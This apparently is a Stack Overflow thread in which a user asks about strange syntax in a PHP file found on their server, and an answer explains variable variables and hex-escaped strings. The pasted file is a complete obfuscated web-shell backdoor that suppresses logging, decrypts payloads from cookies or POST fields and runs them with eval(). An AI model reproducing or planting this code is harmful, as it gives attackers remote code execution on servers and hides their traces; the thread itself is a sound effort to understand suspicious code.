
There is some strange syntax in this PHP code I found:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 /* NOTE(review): this is an obfuscated PHP backdoor (web shell), not application code. Every function name below is assembled one character at a time from the 'v9800' alphabet string, so nothing greppable appears in the file; the long whitespace run after the open tag presumably pushes the payload off-screen in an editor. If this file was found on a server, treat the host as compromised: remove it, rotate credentials, and check the access log for requests that hit it. */ $hd701 = 475;$GLOBALS['xbe829'] = Array();global $xbe829;$xbe829 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800'] = "\x7a\x7b\x60\x5b\x4a\x56\x6c\x51\x21\x62\x38\x66\x44\xa\x2e\x27\x22\x50\x58\x45\x49\x3d\x79\x43\x23\x3b\x53\x29\x2a\x30\x6b\x73\x63\x9\x77\x6f\x47\x6a\x4e\x54\x39\x3f\x40\x4f\x35\x4b\x26\x34\x6d\x5d\x76\x3a\x3c\x64\x71\x67\x5e\x5c\x46\x6e\x75\x4c\xd\x42\x65\x52\x48\x70\x41\x68\x55\x2b\x57\x5a\x69\x7c\x20\x2c\x28\x74\x59\x3e\x2f\x37\x78\x33\x31\x7d\x61\x5f\x7e\x72\x2d\x24\x36\x25\x4d\x32";/* Function-name table: the keys are random-looking strings; the values decode (via the alphabet indices) to chr, ord, strlen, ini_set, serialize, phpversion, unserialize, base64_decode, set_time_limit, plus the two local helpers scdbab and h16107. Because $xbe829 aliases $GLOBALS, every entry is also a global variable. */$xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]] = $xbe829['v9800'][32].$xbe829['v9800'][69].$xbe829['v9800'][91];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]] = $xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][53];$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]] = $xbe829['v9800'][31].$xbe829['v9800'][79].$xbe829['v9800'][91].$xbe829['v9800'][6].$xbe829['v9800'][64].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]] = 
$xbe829['v9800'][74].$xbe829['v9800'][59].$xbe829['v9800'][74].$xbe829['v9800'][89].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]] = $xbe829['v9800'][67].$xbe829['v9800'][69].$xbe829['v9800'][67].$xbe829['v9800'][50].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][31].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]] = $xbe829['v9800'][60].$xbe829['v9800'][59].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]] = $xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][94].$xbe829['v9800'][47].$xbe829['v9800'][89].$xbe829['v9800'][53].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][35].$xbe829['v9800'][53].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]] = 
$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][74].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]] = $xbe829['v9800'][31].$xbe829['v9800'][32].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][9];$xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]] = $xbe829['v9800'][69].$xbe829['v9800'][86].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][29].$xbe829['v9800'][83];/* Input channels: the next two entries alias $_POST and $_COOKIE, which is where the payload arrives. */$xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] = $_POST;$xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] = $_COOKIE;/* Anti-forensics: @-suppressed ini_set('error_log', NULL), ini_set('log_errors', 0), ini_set('max_execution_time', 0) and set_time_limit(0) - a failing or long-running payload leaves nothing in the PHP error log. */@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55], NULL);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][31], 
0);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][48].$xbe829['v9800'][88].$xbe829['v9800'][84].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][84].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][60].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64], 0);@$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]](0);$x7bb89b70 = NULL;$t0e76b849 = NULL;/* Hard-coded authentication key (36 characters, UUID-shaped) stored in the global $p48307594; the `global $p48307594;` that follows exposes it to the helpers below. A request is only acted on if it presents the same value. */$xbe829[$xbe829['v9800'][67].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][40].$xbe829['v9800'][47]] = $xbe829['v9800'][40].$xbe829['v9800'][44].$xbe829['v9800'][88].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][88].$xbe829['v9800'][85].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][64].$xbe829['v9800'][53].$xbe829['v9800'][10].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][47].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][40].$xbe829['v9800'][64].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][10].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][44].$xbe829['v9800'][47];global $p48307594;/* h16107($data, $key): repeating-key XOR of $data with $key, with strlen/chr/ord resolved through the table. This is the payload "decryption". */function  h16107($x7bb89b70, $he719627){global $xbe829;$gea9ce = "";for ($t69c26=0; $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70);){for ($nb3186c8=0; 
$nb3186c8<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($he719627) && $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70); $nb3186c8++, $t69c26++){$gea9ce .= $xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]]($xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($x7bb89b70[$t69c26]) ^ $xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($he719627[$nb3186c8]));}}return $gea9ce;}/* scdbab($data, $name): h16107 applied twice - first with the global key, then with the name of the cookie/POST field the payload arrived in. */function  scdbab($x7bb89b70, $he719627){global $xbe829;global $p48307594;return $xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($x7bb89b70, $p48307594), $he719627);}/* Takes the last cookie (falling back to the last POST field) as the payload and remembers its name; any field name works, so detection cannot rely on a fixed parameter name. */foreach ($xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}if (!$x7bb89b70){foreach ($xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}}$x7bb89b70 = 
/* Payload pipeline: base64_decode -> scdbab -> unserialize(), all @-suppressed. unserialize() on attacker-controlled bytes is a deserialization sink in its own right. */@$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]]($xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]]($xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]]($x7bb89b70), $t0e76b849));/* Dispatch: the decoded array must carry the key under 'ak' (compared with loose ==). Action 'a' == 'i' echoes a serialize()d array with phpversion() and the version tag '1.0-1' (a usable detection string); 'a' == 'e' feeds the 'd' field to eval(), i.e. arbitrary remote code execution. exit() then prevents the host application from running. */if (isset($x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]) && $p48307594==$x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]){if ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][74]){$t69c26 = Array($xbe829['v9800'][67].$xbe829['v9800'][50] => @$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]](),$xbe829['v9800'][31].$xbe829['v9800'][50] => $xbe829['v9800'][86].$xbe829['v9800'][14].$xbe829['v9800'][29].$xbe829['v9800'][92].$xbe829['v9800'][86],);echo @$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]]($t69c26);}elseif ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][64]){eval/*l551d*/($x7bb89b70[$xbe829['v9800'][53]]);}exit();} ?>

In particular, I am curious: what kind of syntax is this?

${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800']
jhaubrich.com
  • Does this answer your question? [What does \x mean in C/C++?](https://stackoverflow.com/questions/2547349/what-does-x-mean-in-c-c) – BadHorsie Sep 11 '20 at 14:54
    If you echo `"\x47\x4c\x4fB\x41\x4c\x53"`, you get `GLOBALS` so doing `${"\x47\x4c\x4fB\x41\x4c\x53"}` is the same as writing `$GLOBALS`. [Here's an example](https://3v4l.org/J0F72) – M. Eriksson Sep 11 '20 at 14:57
    Looks like deliberately obfuscated code... you've not, by any chance, got an out-of-date or vulnerable FTP server running have you? – CD001 Sep 11 '20 at 15:00
  • No, but some of the code I was using originated from an out-of-date and vulnerable ftp server, now that I recall. I have deleted the code, not sure what it was doing – jhaubrich.com Sep 11 '20 at 15:05
  • Please edit the title to enable better searching. – Scratte Sep 12 '20 at 22:49


Firstly, to address the syntax itself: PHP allows you to refer to a variable through a name that is built at runtime (a "variable variable").

Let's say you have a variable:

$test = 123;

You can refer to this variable through a dynamically built name like so:

echo ${'test'};  // Prints '123'

Why would you want to do this? The example above is pointless, but suppose you need to work through a series of variable names at runtime:

$var1 = 'A';
$var2 = 'B';
$var3 = 'C';

for ($i = 1; $i <= 3; $i++) {
    echo ${'var' . $i};
}

// Prints 'ABC'

So now that we know what the syntax means, what does \x47\x4c\x4fB\x41\x4c\x53 mean?

In a double-quoted PHP string, `\x` followed by hex digits is an escape sequence for a single character given by its hexadecimal code. In simple terms, the string you've shown is a sequence of ordinary ASCII characters that someone has written as hexadecimal escapes instead of the human-readable characters you are used to seeing.

If we get rid of the \x escape parts, we are left with:

474c4fB414c53

The B here is not part of an escape: `\x4f` has already consumed its two hex digits, so the B is taken literally. This leaves us with:

474c4f 414c53

Which translates to:

GLO ALS

And if we replace the B we get:

GLOBALS

If we add that back in to your dynamic variable reference and look at the code again, we get:

$GLOBALS['v9800']

This is interesting, because $GLOBALS is a superglobal array in PHP that gives access to every variable in the global scope. So essentially, your code is accessing a global variable called $v9800.

You will have to decide what that means for your application, but this code is suspicious: there is no ordinary reason to hide the name $GLOBALS behind hex escapes, and the rest of the listing builds its function names character by character in the same way. It looks like someone has deliberately disguised what the code does.

BadHorsie